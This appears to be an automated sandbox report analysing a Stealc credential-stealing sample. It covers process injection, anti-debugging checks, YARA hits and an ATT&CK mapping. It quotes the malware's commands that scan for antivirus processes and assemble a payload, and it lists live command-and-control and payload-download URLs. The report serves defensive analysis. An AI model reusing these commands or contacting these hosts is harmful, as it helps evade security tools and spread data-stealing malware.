Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_000BF6A0 CopySid,LogonUserW,GetSecurityDescriptorDacl,AddAce,ShellExecuteW,ExtractIconExW,SHGetDesktopFolder,SHCreateShellItem,SHBrowseForFolderW,ShellExecuteExW,DragQueryPoint,StringFromGUID2,CoCreateInstance,CoUninitialize,EncodePointer,GetSystemTimeAsFileTime,ResumeThread,IsValidCodePage,SetUnhandledExceptionFilter,TlsAlloc,TlsSetValue,GetStringTypeW,SetStdHandle,GetConsoleMode,RtlUnwind,FreeEnvironmentStringsW,SetEnvironmentVariableA,_memmove,	15_2_000BF6A0
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042B383 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0042B383
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00411483 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_00411483
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00411616 SetUnhandledExceptionFilter,	15_2_00411616
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_004108BA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_004108BA
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0041AD48
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041CEEA SetUnhandledExceptionFilter,	16_2_0041CEEA
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_0041B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_0041B33A
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BAFAF memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_022BAFAF
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BD151 SetUnhandledExceptionFilter,	16_2_022BD151
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022BB5A1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	16_2_022BB5A1

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 478F.tmp.exe PID: 8096, type: MEMORYSTR

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Memory written: C:\Users\user\AppData\Local\Temp\773416\Welding.pif base: 400000 value starts with: 4D5A

Jump to behavior

Searches for specific processes (likely to inject)

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		16_2_00419600
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: 16_2_022B9867 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,		16_2_022B9867

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00109369 LogonUserW,

15_2_00109369

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

15_2_000C5240

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00111AC6 SendInput,keybd_event,

15_2_00111AC6

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000BEC83 VkKeyScanW,GetKeyboardState,GetMenuItemID,CheckMenuRadioItem,DeleteMenu,GetCursorPos,SetMenuDefaultItem,SetActiveWindow,mouse_event,CreateIconFromResourceEx,MonitorFromRect,CharLowerBuffW,UnregisterHotKey,LockWindowUpdate,BlockInput,

15_2_000BEC83

Source: C:\Users\user\Desktop\M13W1o3scc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Halo Halo.bat & Halo.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 773416	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "MineralAlertSignificantVanilla" Partition	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Transmit + ..\Turtle + ..\Vienna + ..\Diet + ..\Enclosure + ..\Bangladesh + ..\Mobility + ..\Cool + ..\Completely A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif Welding.pif A	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\773416\Welding.pif C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Process created: C:\Users\user\AppData\Local\Temp\478F.tmp.exe "C:\Users\user\AppData\Local\Temp\478F.tmp.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

15_2_001088CD

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_00114F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

15_2_00114F1C

Source: M13W1o3scc.exe, 00000000.00000003.1693698599.0000000002896000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000A.00000000.1728038915.0000000000166000.00000002.00000001.01000000.00000007.sdmp, Welding.pif, 0000000F.00000000.2027440522.0000000000166000.00000002.00000001.01000000.00000007.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Welding.pif	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000D885B cpuid

15_2_000D885B

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_00436121
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_0043C35A
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,	15_2_00436514
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_0043C5D2
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_0043C61D
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: EnumSystemLocalesW,	15_2_0043C6B8
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_0043C745
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,	15_2_0043C995
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_0043CABE
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetLocaleInfoW,	15_2_0043CBC5
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_0043CC92
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	16_2_00417B90
Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe	Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,	16_2_022B7DF7

Source: C:\Users\user\AppData\Local\Temp\478F.tmp.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000F0030 GetLocalTime,__swprintf,

15_2_000F0030

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000F0722 GetUserNameW,

15_2_000F0722

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif

Code function: 15_2_000E416A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

15_2_000E416A

Source: C:\Users\user\Desktop\M13W1o3scc.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: Amcache.hve.19.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.19.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2258545852.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 478F.tmp.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: Welding.pif	Binary or memory string: WIN_81
Source: Welding.pif	Binary or memory string: WIN_XP
Source: Welding.pif	Binary or memory string: WIN_XPe
Source: Welding.pif	Binary or memory string: WIN_VISTA
Source: Welding.pif	Binary or memory string: WIN_7
Source: Welding.pif	Binary or memory string: WIN_8
Source: Reference.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.3.478F.tmp.exe.22f0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.22a0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.478F.tmp.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2259075839.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000003.2122750294.00000000022F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2258545852.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 478F.tmp.exe PID: 8096, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_0042287C Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,		15_2_0042287C
Source: C:\Users\user\AppData\Local\Temp\773416\Welding.pif	Code function: 15_2_00421BA6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,		15_2_00421BA6

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	21 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	13 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	2 Software Packing	NTDS	136 System Information Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 DLL Side-Loading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	111 Masquerading	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	14 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
M13W1o3scc.exe	5%	ReversingLabs
M13W1o3scc.exe	11%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Avira	HEUR/AGEN.1310247
C:\Users\user\AppData\Local\Temp\478F.tmp.exe	100%	Avira	HEUR/AGEN.1310247
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\478F.tmp.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	29%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe	38%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\478F.tmp.exe	29%	ReversingLabs
C:\Users\user\AppData\Local\Temp\478F.tmp.exe	38%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\773416\Welding.pif	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\773416\Welding.pif	11%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
post-to-me.com	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
http://www.autoitscript.com/autoit3/J	0%	Virustotal		Browse
http://62.204.41.151/ScreenUpdateSync.exe	20%	Virustotal		Browse
http://62.204.41.150/ows	6%	Virustotal		Browse
http://62.204.41.150	9%	Virustotal		Browse
https://post-to-me.com/track_prt.php?sub=&cc=DEvector	3%	Virustotal		Browse
http://62.204.41.151/ScreenUpdateSync.exegyaCannot	18%	Virustotal		Browse
https://www.autoitscript.com/autoit3/	0%	Virustotal		Browse
http://62.204.41.150/edd20096ecef326d.php	12%	Virustotal		Browse
http://62.204.41.150/	9%	Virustotal		Browse
https://post-to-me.com/track_prt.php?sub=	1%	Virustotal		Browse
https://post-to-me.com/	2%	Virustotal		Browse
https://post-to-me.com/track_prt.php?sub=0&cc=DE	3%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
post-to-me.com	172.67.179.207	true	false	2%, Virustotal, Browse	unknown
OrCgYwgbqLzMaeWAfOkOCMa.OrCgYwgbqLzMaeWAfOkOCMa	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://62.204.41.150/edd20096ecef326d.php	true	12%, Virustotal, Browse	unknown
https://post-to-me.com/track_prt.php?sub=0&cc=DE	false	3%, Virustotal, Browse	unknown
http://62.204.41.150/	true	9%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000A.00000000.1728096026.0000000000179000.00000002.00000001.01000000.00000007.sdmp, Welding.pif, 0000000F.00000000.2028195478.0000000000179000.00000002.00000001.01000000.00000007.sdmp, Welding.pif.1.dr, Reference.0.dr	false	0%, Virustotal, Browse	unknown
http://62.204.41.150/edd20096ecef326d.php;C7	478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.151/ScreenUpdateSync.exe	Welding.pif	false	20%, Virustotal, Browse	unknown
http://62.204.41.150/edd20096ecef326d.php32	478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://post-to-me.com/track_prt.php?sub=&cc=DEvector	Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	3%, Virustotal, Browse	unknown
http://62.204.41.150/edd20096ecef326d.phpL	478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/ows	478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false	6%, Virustotal, Browse	unknown
https://post-to-me.com/P	Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.19.dr	false	URL Reputation: safe	unknown
http://62.204.41.150PT~	478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150	478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp, 478F.tmp.exe, 00000010.00000002.2258796788.00000000007CE000.00000004.00000020.00020000.00000000.sdmp	true	9%, Virustotal, Browse	unknown
http://62.204.41.150/edd20096ecef326d.phpDZT	478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_ErrorError	M13W1o3scc.exe	false	URL Reputation: safe	unknown
http://62.204.41.151/ScreenUpdateSync.exegyaCannot	Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	18%, Virustotal, Browse	unknown
https://www.autoitscript.com/autoit3/	M13W1o3scc.exe, 00000000.00000003.1693698599.00000000028A4000.00000004.00000020.00020000.00000000.sdmp, Welding.pif.1.dr, Reference.0.dr	false	0%, Virustotal, Browse	unknown
http://176.113.115.37/ScreenUpdateSync.exeprtscreen1566SOFTWARE	Welding.pif, 0000000F.00000002.4150653141.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.phpXZH	478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/L	478F.tmp.exe, 00000010.00000002.2258896880.000000000080D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://post-to-me.com/track_prt.php?sub=	Welding.pif	false	1%, Virustotal, Browse	unknown
http://176.113.115.37/ScreenUpdateSync.exe:	Welding.pif, 0000000F.00000003.2109919417.0000000001345000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://post-to-me.com/	Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://176.113.115.37/ScreenUpdateSync.exe	Welding.pif, Welding.pif, 0000000F.00000002.4150963294.0000000001344000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000F.00000002.4150963294.0000000001318000.00000004.00000020.00020000.00000000.sdmp, Welding.pif, 0000000F.00000003.2109919417.0000000001345000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/Hx	478F.tmp.exe, 00000010.00000002.2258896880.0000000000843000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://62.204.41.150/edd20096ecef326d.phpd	478F.tmp.exe, 00000010.00000002.2258896880.0000000000859000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
176.113.115.37	unknown	Russian Federation	49505	SELECTELRU	false
172.67.179.207	post-to-me.com	United States	13335	CLOUDFLARENETUS	false
62.204.41.150	unknown	United Kingdom	30798	TNNET-ASTNNetOyMainnetworkFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528594
Start date and time:	2024-10-08 03:51:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 20s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	M13W1o3scc.exe renamed because original name is a hash value
Original Sample Name:	e6dd6a25125edd4c21fe5cf7bafcd2bb.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@27/22@2/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 58 Number of non-executed functions: 340
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 104.208.16.94
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
21:52:42	API Interceptor	9069463x Sleep call for process: Welding.pif modified
21:52:58	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
176.113.115.37	XQywAEbb9e.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.37/seed.exe
176.113.115.37	file.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.37/seed.exe
172.67.179.207	InstallSetup.exe	Get hash	malicious	Stealc	Browse
62.204.41.150	100f1c346cbcff15f4d9d75c791000625850e1c82b44c.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	MmcJhaiYNh.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	XQywAEbb9e.exe	Get hash	malicious	Stealc, Vidar	Browse	62.204.41.150/edd20096ecef326d.php
	Aew8SXjXEb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	RJQySowVRb.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	1f13Cs1ogc.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	5rVhexjLCx.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php
	file.exe	Get hash	malicious	Stealc	Browse	62.204.41.150/edd20096ecef326d.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
post-to-me.com	InstallSetup.exe	Get hash	malicious	Stealc	Browse	172.67.179.207

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
SELECTELRU	XQywAEbb9e.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.37
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	5.188.118.119
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	176.113.115.37
	https://t.co/dvIdjH2Xsv	Get hash	malicious	Unknown	Browse	37.9.4.197
	https://go.hginsights.com/rs/214-HYO-692/images/HG	Get hash	malicious	Unknown	Browse	37.9.4.115
